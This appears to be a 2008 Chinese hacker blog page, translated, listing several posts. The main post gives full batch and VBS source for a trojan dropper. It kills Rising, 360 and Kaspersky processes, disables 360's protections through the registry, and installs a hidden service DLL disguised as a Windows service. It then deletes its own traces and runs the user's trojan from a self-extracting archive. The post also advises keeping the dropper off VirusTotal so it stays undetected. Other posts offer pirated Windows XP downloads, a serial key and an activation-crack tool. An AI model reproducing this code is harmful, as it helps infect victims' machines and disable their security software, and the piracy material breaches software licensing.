Nero 7 keygen
[ 2008/08/19 10:33 | by selboo ]
Driver Firewall Ver 3.1
[ 2008/08/18 16:24 | by selboo ]
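Reposted from http://www.wolfexp.net/forum/viewthread.php?tid=6714&extra=page%3D1
Built on the idea behind Wangwei's (网维) driver firewall. It adds interception of several loading methods and interception of web-delivered trojans (网马); in testing it blocked every web trojan currently in circulation. Paired with a system-restore setup, it works very nicely.....
Compared with 1.0 it adds some sensitive functions; unless new driver-loading methods are discovered, this is very likely the last version.
I have tested it myself on 2000, XP and 2003 and it runs stably on all of them. It is a small piece of work from the time I have been learning driver development, something with real substance; experts, please don't laugh at me.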

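Attached are screenshots of web trojans and drivers being intercepted.
2008/08/15 04:28 Corrected and optimized parts of the code; more stable
2008/08/16 16:28 Added two startup modes, user mode and background mode. Background mode is started by passing the argument "noquit" to the program; in background mode, closing the program and changing the configuration are disabled
2008/08/16 23:18 Fixed a bug caused by the old server component not being removed completely
2008/08/18 00:04 Added monitoring of some sensitive functions
2008/08/18 15:21 Strengthened self-protection
A small tool that can kill Rising, Kingsoft, NOD32 and 360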
[ 2008/08/17 17:14 | by selboo ]
This uses two .bat files, two .vbs files and one kill.exe.
Source code below:
Source of setdt.vbs:
set Cleaner=createobject("wscript.shell")
Cleaner.run "setdt.bat",vbhide
Source of setdt.bat:
@ECHO OFF
@date /t>C:\time.txt
date 1988-09-18
hide.vbs
@date <C:\time.txt
del %SystemRoot%\system32\setdt.vbs
del %SystemRoot%\system32\hide.vbs
del %SystemRoot%\system32\command.exe
del %SystemRoot%\system32\xKill.exe
del %SystemRoot%\system32\xkill.bat
del C:\time.txt
del %0
Source of hide.vbs:
dim shell
set shell=CreateObject("Wscript.Shell")
WScript.Sleep 100000
shell.run "cmd /c start %SystemRoot%\system32\xKill.exe",0
set Cleaner=createobject("wscript.shell")
Cleaner.run "xkill.bat",vbhide
WScript.Sleep 100000
shell.run "cmd /c start %SystemRoot%\system32\command.exe",0
Source of xkill.bat:
@echo off
taskkill /f /im rstray.exe >NUL
taskkill /f /im 360tray.exe >NUL
taskkill /f /im 360safe.exe >NUL
echo Windows Registry Editor Version 5.00>>kill.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\360Safe\safemon]>>kill.reg
echo "MonAccess"=dword:00000000>>kill.reg
echo "SiteAccess"=dword:00000000>>kill.reg
echo "ExecAccess"=dword:00000000>>kill.reg
echo "UDiskAccess"=dword:00000000>>kill.reg
echo "LeakShowed"=dword:00000000>>kill.reg
sc create DARK binpath= %windir%\System32\darkkill.dll
sc config DARK start= disabled
echo Windows Registry Editor Version 5.00>>dark.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DARK]>>dark.reg
echo "Type"=dword:00000110>>dark.reg
echo "Start"=dword:00000002>>dark.reg
echo "ErrorControl"=dword:00000001>>dark.reg
echo "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\>>dark.reg
echo 74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,\>>dark.reg
echo 00,76,00,63,00,68,00,6f,00,73,00,74,00,2e,00,65,00,78,00,65,00,20,00,2d,00,\>>dark.reg
echo 6b,00,20,00,6e,00,65,00,74,00,73,00,76,00,63,00,73,00,00,00>>dark.reg
echo "DisplayName"="Background Intelligent Transfer Service">>dark.reg
echo "DependOnService"=hex(7):52,00,70,00,63,00,53,00,73,00,00,00,00,00>>dark.reg
echo "DependOnGroup"=hex(7):00,00>>dark.reg
echo "ObjectName"="LocalSystem">>dark.reg
echo "Description"=hex(2):00,00>>dark.reg
echo
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DARK\Parameters]>>dark.reg
echo "ServiceDll"=hex(2):43,00,3a,00,5c,00,57,00,49,00,4e,00,44,00,4f,00,57,00,53,\>>dark.reg
echo 00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,64,00,61,00,\>>dark.reg
echo 72,00,6b,00,6b,00,69,00,6c,00,6c,00,2e,00,64,00,6c,00,6c,00,00,00>>dark.reg
echo
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DARK\Security]>>dark.reg
echo "Security"=hex:01,00,14,80,90,00,00,00,9c,00,00,00,14,00,00,00,30,00,00,00,02,\>>dark.reg
echo 00,1c,00,01,00,00,00,02,80,14,00,ff,01,0f,00,01,01,00,00,00,00,00,01,00,00,\>>dark.reg
echo 00,00,02,00,60,00,04,00,00,00,00,00,14,00,fd,01,02,00,01,01,00,00,00,00,00,\>>dark.reg
echo 05,12,00,00,00,00,00,18,00,ff,01,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,\>>dark.reg
echo 20,02,00,00,00,00,14,00,8d,01,02,00,01,01,00,00,00,00,00,05,0b,00,00,00,00,\>>dark.reg
echo 00,18,00,fd,01,02,00,01,02,00,00,00,00,00,05,20,00,00,00,23,02,00,00,01,01,\>>dark.reg
echo 00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00>>dark.reg
echo
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DARK\Enum]>>dark.reg
echo "0"="Root\\LEGACY_DARK\\0000">>dark.reg
echo "Count"=dword:00000001>>dark.reg
echo "NextInstance"=dword:00000001>>dark.reg
regedit /s dark.reg
regedit /s kill.reg
COPY dark.dll %windir%\System32\darkkill.dll
sc config DARK start= AUTO
net start DARK
attrib %windir%\System32\darkkill.dll +s +h
del kill.reg
del dark.reg
del dark.dll
del dark.exe
xkill.exe
taskkill /f /im kav.exe >NUL
del %0
xkill.exe

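Please don't upload xkill.exe to antivirus scanning sites to try it out. I once had a genuinely undetected trojan in front of me and did not cherish it: I uploaded it to the scanning site www.virustotal.com, and the result........
To use this tool, extract it, copy your trojan into the extracted directory and rename it command.exe, then pack everything with WinRAR into a self-extracting archive set to run setdt.vbs after extraction.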
Copyright(C) 1999-2008 搁氵,━═戋 All Rights Reserved BloG: http://hi.baidu.com/hackerfield
Red Wolf (红狼) Remote Control Security Team: http://www.wolfexp.net/
Tool MD5: 9566b78aa412970b148f90baa137e7de
BAT downloader code generator
[ 2008/08/16 18:22 | by selboo ]
Windows XP retail edition: download links and activation method
[ 2008/08/12 12:12 | by selboo ]
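I. Windows XP SP2 Simplified Chinese retail edition
Volume label: VRMPFPP_CN
File size: 600M
MD5: a1ba6a76c995c453c5b12ec5c1ab4a67
SHA1: 92934976213bb9201057281a200f84127be0050d
ISO/CRC: FFFFFFFF
According to some forum users, this edition is somewhat more stable than the volume-license (VOL) edition; it is a clean install edition that requires activation. Whether that is true, I am still testing. Everyone is welcome to discuss.
Download: my Nami (纳米) network drive (note: this is the fastest method, but it requires installing Nami Robot)
Installation serial number: BX6HT-MDJKW-H2J4X-BX67W-TVVFG (note it down before installing; VOL-edition serial numbers cannot be used). Manual activation is required after installation; the activation file is in the attachment.
Another download link: ed2k://|file|VRMPFPP_CN.iso|6213 ... 6CW4SNKVYICXWQV|/tN (this link downloads very slowly)
After installation, this edition needs many patches that you have to apply yourself. You can use the Yulin (雨林) patch pack, which applies all of them quickly. Download: latest complete patch collection
II. Windows XP SP3 Simplified Chinese retail edition
Release date (UTC): 5/1/2008 11:01:59 PM
SHA1: 69dbf131116760932dcf132ade111d6b45778098
MD5: 534314ec312e8407cfdc6ef1ff21b804
ISO/CRC: FFFFFFFF
1. Direct download with Xunlei (click): Windows XP SP3 Simplified Chinese retail edition (very slow)
2. Network drive download (requires the RaySource software)
Download: http://www.fs2you.com/en/files/b9905975-18e9-11dd-8b8b-0014221b798a/
Installation serial numbers: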
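III. Activation method
I have downloaded and tested both editions above; they are genuine originals, and anyone after perfection can download them and try. Manual activation is needed after installation, but here is an automatic activation tool that handles activation and cracking in one pass.
Download the xpoem activation tool: http://www.fs2you.com/zh-cn/files/911cca85-4762-11dd-88f6-00142218fc6e/
After downloading, reboot into Safe Mode, extract and run the XPOEM activation-free program, then reboot; the system is now an OEM edition and is activated. It passes Microsoft's genuine validation page without trouble.
Note: when installing the SP3 retail edition you can skip entering a serial number. After you log in there will be an activation prompt; ignore it, and running the tool in Safe Mode removes it.
This method also works for the VOL edition. VOL keys can also be blocked, whereas that is unlikely for OEM. The software only replaces a few system files with their OEM versions and has no effect on the system, so use it with confidence!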